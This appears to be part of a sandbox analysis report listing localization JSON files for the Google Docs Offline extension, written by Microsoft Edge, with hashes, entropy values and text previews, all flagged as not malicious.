                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                      SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                      SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1042
                                                                                                                                                                                                                                                      Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                      MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                      SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                      SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                      SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2535
                                                                                                                                                                                                                                                      Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                      MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                      SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                      SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                      SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                      Malicious:false
